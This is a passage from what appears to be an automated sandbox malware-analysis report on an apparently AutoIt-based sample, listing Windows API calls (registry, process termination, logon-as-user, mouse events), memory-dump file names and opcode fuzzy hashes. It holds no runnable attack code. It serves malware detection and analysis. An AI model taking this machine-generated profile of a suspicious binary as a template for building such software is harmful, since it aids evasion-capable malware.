                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                              • String ID:
                                              • API String ID: 3567560977-0
                                              • Opcode ID: 7c3f3fe2daa9bb98cc1c48af9f05f099ee27c445b8d8555161bff1a1e16e3b9f
                                              • Instruction ID: cd9ccaf0e75c53cb0df2c73698824fbdf534c4642ed31c9b439b3ad468bb94a8
                                              • Opcode Fuzzy Hash: 7c3f3fe2daa9bb98cc1c48af9f05f099ee27c445b8d8555161bff1a1e16e3b9f
                                              • Instruction Fuzzy Hash: 8BF06D32519712EAEA747B78BC0375A2AE4DB41772F2047E9FC50D60E3EF50880941A0
                                              APIs
                                              • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00B54282,?), ref: 00B541D3
                                              • GetProcAddress.KERNEL32(00000000), ref: 00B541DA
                                              • EncodePointer.KERNEL32(00000000), ref: 00B541E6
                                              • DecodePointer.KERNEL32(00000001,00B54282,?), ref: 00B54203
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                              • String ID: RoInitialize$combase.dll
                                              • API String ID: 3489934621-340411864
                                              • Opcode ID: 1f1c724434fa698169da80b9598d071092dc552087d279ceb24c5d33c7cebcc4
                                              • Instruction ID: ea0b9ad806d6ac9f23ae521e162aa036ec51933bdc98b5ac5c2780e8ff31af0c
                                              • Opcode Fuzzy Hash: 1f1c724434fa698169da80b9598d071092dc552087d279ceb24c5d33c7cebcc4
                                              • Instruction Fuzzy Hash: 43E0EDB0660741AFDB202B70DD4DF543994A758B0AF504464B901E71B0CFB55585CE04
                                              APIs
                                              • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00B541A8), ref: 00B542A8
                                              • GetProcAddress.KERNEL32(00000000), ref: 00B542AF
                                              • EncodePointer.KERNEL32(00000000), ref: 00B542BA
                                              • DecodePointer.KERNEL32(00B541A8), ref: 00B542D5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                              • String ID: RoUninitialize$combase.dll
                                              • API String ID: 3489934621-2819208100
                                              • Opcode ID: f2208546c37f9fb53eb9dc86073719876f72d05a0f80a98de4e87b3d9939f501
                                              • Instruction ID: 5350928589da849ef4156543877d856457434ede658b622c21ec2d7b9f3c8343
                                              • Opcode Fuzzy Hash: f2208546c37f9fb53eb9dc86073719876f72d05a0f80a98de4e87b3d9939f501
                                              • Instruction Fuzzy Hash: E4E0B670660B01EFEB20AB60ED0DF553AE4BB48B06F5441A8F601E70B0CFB56698CA14
                                              APIs
                                              • GetClientRect.USER32(?,?), ref: 00B321B8
                                              • GetWindowRect.USER32(?,?), ref: 00B321F9
                                              • ScreenToClient.USER32(?,?), ref: 00B32221
                                              • GetClientRect.USER32(?,?), ref: 00B32350
                                              • GetWindowRect.USER32(?,?), ref: 00B32369
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Rect$Client$Window$Screen
                                              • String ID:
                                              • API String ID: 1296646539-0
                                              • Opcode ID: 418aa431b60d820c5ddd1ec92e86a8ec8bbdc1bacb1eb8be5a00bbdb8a4b8b2e
                                              • Instruction ID: 117860fd0be939ba4814b3126b43aea36d497ca999e1992f63b8c667d5f067e3
                                              • Opcode Fuzzy Hash: 418aa431b60d820c5ddd1ec92e86a8ec8bbdc1bacb1eb8be5a00bbdb8a4b8b2e
                                              • Instruction Fuzzy Hash: A6B13839900249DBDB10CFA8C980BEEB7F1FF08710F2485A9ED59EB254DB35A950CB64
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: _memmove$__itow__swprintf
                                              • String ID:
                                              • API String ID: 3253778849-0
                                              APIs
                                                • Part of subcall function 00B41A36: _memmove.LIBCMT ref: 00B41A77
                                                • Part of subcall function 00BB147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00BB040D,?,?), ref: 00BB1491
                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00BB091D
                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00BB095D
                                              • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00BB0980
                                              • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00BB09A9
                                              • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00BB09EC
                                              • RegCloseKey.ADVAPI32(00000000), ref: 00BB09F9
                                              Similarity
                                              • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                              • String ID:
                                              • API String ID: 4046560759-0
                                              APIs
                                              • GetMenu.USER32(?), ref: 00BB5E38
                                              • GetMenuItemCount.USER32(00000000), ref: 00BB5E6F
                                              • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00BB5E97
                                              • GetMenuItemID.USER32(?,?), ref: 00BB5F06
                                              • GetSubMenu.USER32(?,?), ref: 00BB5F14
                                              • PostMessageW.USER32(?,00000111,?,00000000), ref: 00BB5F65
                                              Similarity
                                              • API ID: Menu$Item$CountMessagePostString
                                              • String ID:
                                              • API String ID: 650687236-0
                                              APIs
                                              • VariantInit.OLEAUT32(?), ref: 00B8F6A2
                                              • VariantClear.OLEAUT32(00000013), ref: 00B8F714
                                              • VariantClear.OLEAUT32(00000000), ref: 00B8F76F
                                              • _memmove.LIBCMT ref: 00B8F799
                                              • VariantClear.OLEAUT32(?), ref: 00B8F7E6
                                              • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00B8F814
                                              Similarity
                                              • API ID: Variant$Clear$ChangeInitType_memmove
                                              • String ID:
                                              • API String ID: 1101466143-0
                                              APIs
                                              • _memset.LIBCMT ref: 00B929FF
                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B92A4A
                                              • IsMenu.USER32(00000000), ref: 00B92A6A
                                              • CreatePopupMenu.USER32 ref: 00B92A9E
                                              • GetMenuItemCount.USER32(000000FF), ref: 00B92AFC
                                              • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00B92B2D
                                              Similarity
                                              • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                              • String ID:
                                              • API String ID: 3311875123-0
                                              APIs
                                                • Part of subcall function 00B329E2: GetWindowLongW.USER32(?,000000EB), ref: 00B329F3
                                              • BeginPaint.USER32(?,?,?,?,?,?), ref: 00B31B76
                                              • GetWindowRect.USER32(?,?), ref: 00B31BDA
                                              • ScreenToClient.USER32(?,?), ref: 00B31BF7
                                              • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00B31C08
                                              • EndPaint.USER32(?,?), ref: 00B31C52
                                              Similarity
                                              • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                              • String ID:
                                              • API String ID: 1827037458-0
                                              APIs
                                              • ShowWindow.USER32(00BF77B0,00000000,01945748,?,?,00BF77B0,?,00BBBC1A,?,?), ref: 00BBBD84
                                              • EnableWindow.USER32(?,00000000), ref: 00BBBDA8
                                              • ShowWindow.USER32(00BF77B0,00000000,01945748,?,?,00BF77B0,?,00BBBC1A,?,?), ref: 00BBBE08
                                              • ShowWindow.USER32(?,00000004,?,00BBBC1A,?,?), ref: 00BBBE1A
                                              • EnableWindow.USER32(?,00000001), ref: 00BBBE3E
                                              • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00BBBE61
                                              Similarity
                                              • API ID: Window$Show$Enable$MessageSend
                                              • String ID:
                                              • API String ID: 642888154-0
                                              APIs
                                              • GetForegroundWindow.USER32(?,?,?,?,?,?,00BA550C,?,?,00000000,00000001), ref: 00BA7796
                                                • Part of subcall function 00BA406C: GetWindowRect.USER32(?,?), ref: 00BA407F
                                              • GetDesktopWindow.USER32 ref: 00BA77C0
                                              • GetWindowRect.USER32(00000000), ref: 00BA77C7
                                              • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00BA77F9
                                                • Part of subcall function 00B957FF: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00B95877
                                              • GetCursorPos.USER32(?), ref: 00BA7825
                                              • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00BA7883
                                              Similarity
                                              • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                              • String ID:
                                              • API String ID: 4137160315-0
                                              APIs
                                                • Part of subcall function 00B88CC7: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00B88CDE
                                                • Part of subcall function 00B88CC7: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00B88CE8
                                                • Part of subcall function 00B88CC7: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00B88CF7
                                                • Part of subcall function 00B88CC7: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00B88CFE
                                                • Part of subcall function 00B88CC7: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00B88D14
                                              • GetLengthSid.ADVAPI32(?,00000000,00B8904D), ref: 00B89482
                                              • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00B8948E
                                              • HeapAlloc.KERNEL32(00000000), ref: 00B89495
                                              • CopySid.ADVAPI32(00000000,00000000,?), ref: 00B894AE
                                              • GetProcessHeap.KERNEL32(00000000,00000000,00B8904D), ref: 00B894C2
                                              • HeapFree.KERNEL32(00000000), ref: 00B894C9
                                              Similarity
                                              • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                              • String ID:
                                              • API String ID: 3008561057-0
                                              APIs
                                              • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00B89200
                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00B89207
                                              • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00B89216
                                              • CloseHandle.KERNEL32(00000004), ref: 00B89221
                                              • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00B89250
                                              • DestroyEnvironmentBlock.USERENV(00000000), ref: 00B89264
                                              Similarity
                                              • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                              • String ID:
                                              • API String ID: 1413079979-0
                                              APIs
                                              • GetDC.USER32(00000000), ref: 00B8C34E
                                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 00B8C35F
                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B8C366
                                              • ReleaseDC.USER32(00000000,00000000), ref: 00B8C36E
                                              • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00B8C385
                                              • MulDiv.KERNEL32(000009EC,?,?), ref: 00B8C397
                                              Similarity
                                              • API ID: CapsDevice$Release
                                              • String ID:
                                              • API String ID: 1035833867-0
                                              APIs
                                                • Part of subcall function 00B316CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00B31729
                                                • Part of subcall function 00B316CF: SelectObject.GDI32(?,00000000), ref: 00B31738
                                                • Part of subcall function 00B316CF: BeginPath.GDI32(?), ref: 00B3174F
                                                • Part of subcall function 00B316CF: SelectObject.GDI32(?,00000000), ref: 00B31778
                                              • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00BBC57C
                                              • LineTo.GDI32(00000000,00000003,?), ref: 00BBC590
                                              • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00BBC59E
                                              • LineTo.GDI32(00000000,00000000,?), ref: 00BBC5AE
                                              • EndPath.GDI32(00000000), ref: 00BBC5BE
                                              • StrokePath.GDI32(00000000), ref: 00BBC5CE
                                              Similarity
                                              • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                              • String ID:
                                              • API String ID: 43455801-0
                                              • Opcode ID: 4ff0f05548a74043204393f553f62d99e602597fd6810a75b8cb79bac4272136
                                              • Instruction ID: 622a3885573dde9fd61065b407e4db488a027e54f84bde4352cd18733750092e
                                              • Opcode Fuzzy Hash: 4ff0f05548a74043204393f553f62d99e602597fd6810a75b8cb79bac4272136
                                              • Instruction Fuzzy Hash: 1D11097200010CBFDB12AF91DC89EEA7FADEB08354F048051BA589A160CB71AE55DBA0
                                              APIs
                                              • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00B507EC
                                              • MapVirtualKeyW.USER32(00000010,00000000), ref: 00B507F4
                                              • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00B507FF
                                              • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00B5080A
                                              • MapVirtualKeyW.USER32(00000011,00000000), ref: 00B50812
                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B5081A
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Virtual
                                              • String ID:
                                              • API String ID: 4278518827-0
                                              • Opcode ID: ca5e818d7c8613ac288e4ca7c9e4ae217ec6a1eda2346190b754cf6d4c8af68f
                                              • Instruction ID: 8c8e88c1d8dec1b1a04d7e8a7bb374647e9004524b07c38a2ff8e60cee659caa
                                              • Opcode Fuzzy Hash: ca5e818d7c8613ac288e4ca7c9e4ae217ec6a1eda2346190b754cf6d4c8af68f
                                              • Instruction Fuzzy Hash: 54016CB0901759BDE3009F5A8C85B52FFA8FF59354F00411BA15C47941C7F5A864CBE5
                                              APIs
                                              • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00B959B4
                                              • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00B959CA
                                              • GetWindowThreadProcessId.USER32(?,?), ref: 00B959D9
                                              • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B959E8
                                              • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B959F2
                                              • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B959F9
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                              • String ID:
                                              • API String ID: 839392675-0
                                              • Opcode ID: 536beec5ee09ca732fbaf24be0bb96a3e56925a9ede024c4f174530c4e0013c8
                                              • Instruction ID: bb6564b3d9ed68dc0ad5b0059c6c965ea249303b3b55308398adf811b490fe39
                                              • Opcode Fuzzy Hash: 536beec5ee09ca732fbaf24be0bb96a3e56925a9ede024c4f174530c4e0013c8
                                              • Instruction Fuzzy Hash: 95F01D72251558FBE7216B929C0DEEF7A7CEBCAB11F040169FA05A2050DBA11A1186B5
                                              APIs
                                              • InterlockedExchange.KERNEL32(?,?), ref: 00B977FE
                                              • EnterCriticalSection.KERNEL32(?,?,00B3C2B6,?,?), ref: 00B9780F
                                              • TerminateThread.KERNEL32(00000000,000001F6,?,00B3C2B6,?,?), ref: 00B9781C
                                              • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00B3C2B6,?,?), ref: 00B97829
                                                • Part of subcall function 00B971F0: CloseHandle.KERNEL32(00000000,?,00B97836,?,00B3C2B6,?,?), ref: 00B971FA
                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 00B9783C
                                              • LeaveCriticalSection.KERNEL32(?,?,00B3C2B6,?,?), ref: 00B97843
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                              • String ID:
                                              • API String ID: 3495660284-0
                                              • Opcode ID: 1769c4955193c3385c9c9a3e9104e89d11e6db9397134dbf7796b6952e87a4ed
                                              • Instruction ID: 273534af24f0cb59ec0b9f2d158740b8bb1db4f2501ec2702c206401b1e6e511
                                              • Opcode Fuzzy Hash: 1769c4955193c3385c9c9a3e9104e89d11e6db9397134dbf7796b6952e87a4ed
                                              • Instruction Fuzzy Hash: CDF05E321A5212EBD7113B64EC8CEAB77A9FF4D302F240461F102AA0A0CFB55801CB60
                                              APIs
                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00B89555
                                              • UnloadUserProfile.USERENV(?,?), ref: 00B89561
                                              • CloseHandle.KERNEL32(?), ref: 00B8956A
                                              • CloseHandle.KERNEL32(?), ref: 00B89572
                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00B8957B
                                              • HeapFree.KERNEL32(00000000), ref: 00B89582
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                              • String ID:
                                              • API String ID: 146765662-0
                                              • Opcode ID: 0fb85708a6efcd1834f376d004f39e3a05d45418f6abb2d93fbf4690b87d6e16
                                              • Instruction ID: 63601c6b4680ccc8b7f3b8bb631062f96ab4050136a0106330eeebfd0fbd1dda
                                              • Opcode Fuzzy Hash: 0fb85708a6efcd1834f376d004f39e3a05d45418f6abb2d93fbf4690b87d6e16
                                              • Instruction Fuzzy Hash: 05E0C236014541FBDA012BE6EC0CD5AFB29FB8D722B144221F22592070CF32A460DB50
                                              APIs
                                              • VariantInit.OLEAUT32(?), ref: 00BA8CFD
                                              • CharUpperBuffW.USER32(?,?), ref: 00BA8E0C
                                              • VariantClear.OLEAUT32(?), ref: 00BA8F84
                                                • Part of subcall function 00B97B1D: VariantInit.OLEAUT32(00000000), ref: 00B97B5D
                                                • Part of subcall function 00B97B1D: VariantCopy.OLEAUT32(00000000,?), ref: 00B97B66
                                                • Part of subcall function 00B97B1D: VariantClear.OLEAUT32(00000000), ref: 00B97B72
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Variant$ClearInit$BuffCharCopyUpper
                                              • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                              • API String ID: 4237274167-1221869570
                                              • Opcode ID: 654024f2184ec52713d1aade4295070fa7bb772f13f23711ea7aedeb7353f6e8
                                              • Instruction ID: 1e5ba5dc59a2f6402b1b2b8a031f7d2084d3cdaf28a11253460d08b65765e9bb
                                              • Opcode Fuzzy Hash: 654024f2184ec52713d1aade4295070fa7bb772f13f23711ea7aedeb7353f6e8
                                              • Instruction Fuzzy Hash: FC916B70608301DFC710DF24C48495ABBF5EF9A354F1489AEF89A8B7A2DB31E945CB52
                                              APIs
                                                • Part of subcall function 00B4436A: _wcscpy.LIBCMT ref: 00B4438D
                                              • _memset.LIBCMT ref: 00B9332E
                                              • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00B9335D
                                              • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00B93410
                                              • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00B9343E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: ItemMenu$Info$Default_memset_wcscpy
                                              • String ID: 0
                                              • API String ID: 4152858687-4108050209
                                              • Opcode ID: 4801efc5bf8a06e89846963af666c89ec9a13392b6cd49b84ad7f9e84d6d1ab0
                                              • Instruction ID: 047d375da31dcc9cf322b29b2a7c57deb95d3becc931dfa1e260f1e9eef3b645
                                              • Opcode Fuzzy Hash: 4801efc5bf8a06e89846963af666c89ec9a13392b6cd49b84ad7f9e84d6d1ab0
                                              • Instruction Fuzzy Hash: DD51CF316083009BDB259F28C845B6BBBE8EF45B60F0549BDF895D32E1DB20CE48C756
                                              APIs
                                              • _memset.LIBCMT ref: 00B92F67
                                              • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00B92F83
                                              • DeleteMenu.USER32(?,00000007,00000000), ref: 00B92FC9
                                              • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00BF7890,00000000), ref: 00B93012
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Menu$Delete$InfoItem_memset
                                              • String ID: 0
                                              • API String ID: 1173514356-4108050209
                                              • Opcode ID: 78416e1e1bcd2e7c20f195c949059c691bc431f6f7029b05f3ef4c32a267bd94
                                              • Instruction ID: bd52fb82f18503b4b264fe99f54d6914f2812a0f13c02d9bbf86daab7d2e07d5
                                              • Opcode Fuzzy Hash: 78416e1e1bcd2e7c20f195c949059c691bc431f6f7029b05f3ef4c32a267bd94
                                              • Instruction Fuzzy Hash: 1C41A331604341AFDB20DF24C884F5ABBE4EF89710F144AADF5A5972D1DB70EA05CB56
                                              APIs
                                              • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00BADEAE
                                                • Part of subcall function 00B41462: _memmove.LIBCMT ref: 00B414B0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
